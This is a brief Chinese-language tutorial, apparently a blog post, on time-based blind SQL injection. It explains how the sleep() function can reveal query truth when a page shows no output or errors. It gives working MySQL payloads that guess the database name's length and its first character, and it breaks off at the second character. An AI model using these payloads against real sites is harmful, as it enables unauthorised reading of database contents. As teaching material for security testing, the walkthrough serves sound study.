一次手工和工具的延时注入（时间注入）

一次手工和工具的延时注入（时间注入）

延时注入的原理

适用于，无法回现和无法显示错误页面的场景

##利用函数sleep（）让服务器休眠，通过休眠时间判断执行的语句对错，从而得到我们想要的信息
1，判断当前库名的长度
and if (length(database())=8,0,sleep(5))#0
结果=8时网页没睡眠，可以判断当前库名有8个字符

2，猜库名
and if (ascii(substr(database(),1,1))=115,0,sleep(5))

结果=115时网页没睡眠，可以判断库名第一个字符对应的ascii码为115 字符为s

判断第二个字符